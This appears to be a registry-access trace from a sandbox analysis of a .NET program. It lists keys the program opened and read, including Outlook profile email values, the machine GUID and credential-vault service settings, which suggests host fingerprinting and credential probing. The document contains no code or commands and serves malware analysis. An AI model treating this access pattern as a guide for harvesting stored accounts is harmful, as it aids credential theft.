HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENBreakOnWorker
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGenRegistryAccessCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NetFramework\v2.0.50727\NGENService\State
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v2.0.50727\NGENService\State\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v2.0.50727\NGENService\State\ExtraInstallSteps
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceBreakOnStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGenMaxLogSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceTestHookDll
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServicePolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NetFramework\v2.0.50727\NGENService\ListenedState
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v2.0.50727\NGENService\ListenedState\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v2.0.50727\NGENService\ListenedState\RootstoreDirty
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENUseService
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorsvw.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NetFramework\v2.0.50727\NGENService\State\PendingReboot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceWaitAggressiveWork
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceConservative
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceWaitWorking
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGenWorkerCount
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\EnableMultiproc
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\SvcRetryNgenFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGenLocalWorker
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceRestrictWorkersPrivileges
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v2.0.50727\NGENService\State\PendingUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceWorkerPriority
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGenServiceDebugLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NicPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\RegistryRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AssemblyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AssemblyPath2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Client\Install
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGEN_USE_PRIVATE_STORE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\DefaultVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\ZapSet
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGENService\Roots\WorkPending
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGENBreakOnWorker
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGenRegistryAccessCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGENService\State\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGENService\State\ExtraInstallSteps
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\CLRLoadLogDir

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-us
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-us
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\B204B4C2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000\ProfileImagePath
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NameResource
